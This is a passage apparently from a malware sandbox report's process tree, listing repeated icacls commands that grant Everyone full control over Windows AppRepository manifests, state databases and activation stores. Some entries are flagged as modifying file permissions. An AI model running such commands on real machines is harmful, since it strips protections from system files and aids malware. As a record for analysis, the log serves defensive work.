    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5456
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4456
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4780
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6292
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3904
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6684
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4668
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6412
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6080
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6200
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5624
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6256
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5112
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6284
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6028
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6568
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_2016.511.9510.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4072
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6524
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5840
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4956
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4372
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:68
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:7120
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:1096
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4812
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6484
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5888
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4612
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5220
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4504
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2700
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6572
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5724
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6420
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:3764
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4768
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4644
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6816
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6160
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:1676
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5216
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4660
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4620
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2424
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6272
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4848
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6740
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5748
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6684
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6296
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6108
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3940
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5332
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6204
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4876
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5100
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5704
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd /grant Everyone:F /T /C /Q
    3⤵
    PID:2152
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm /grant Everyone:F /T /C /Q
    3⤵
    PID:6568
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal /grant Everyone:F /T /C /Q
    3⤵
    PID:4072
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd /grant Everyone:F /T /C /Q
    3⤵
    PID:5760
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm /grant Everyone:F /T /C /Q
    3⤵
    PID:4680
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal /grant Everyone:F /T /C /Q
    3⤵
    PID:6548
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5960
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:1728
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:656
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:4812
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:5424
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5496
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6924
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:6676
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    PID:4976
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:6768
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6472
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:6156
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    PID:2528
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:4648
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:2772
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    PID:4532
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:3932
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:2972
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:4348
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5776
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6092
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:3492
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:7036
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:4660
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:6252
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:2224
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:4520
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5244
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5392
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:5248
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5044
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5796
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:6644
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5808
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-3686645723-710336880-414668232-1000.pckgdep /grant Everyone:F /T /C /Q
    3⤵
    PID:5700
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:4652
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:4980
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5156
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:6232
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:5640
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:7072
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:1384
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:2116
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5040
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:7120
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:3928
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:5772
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:5260
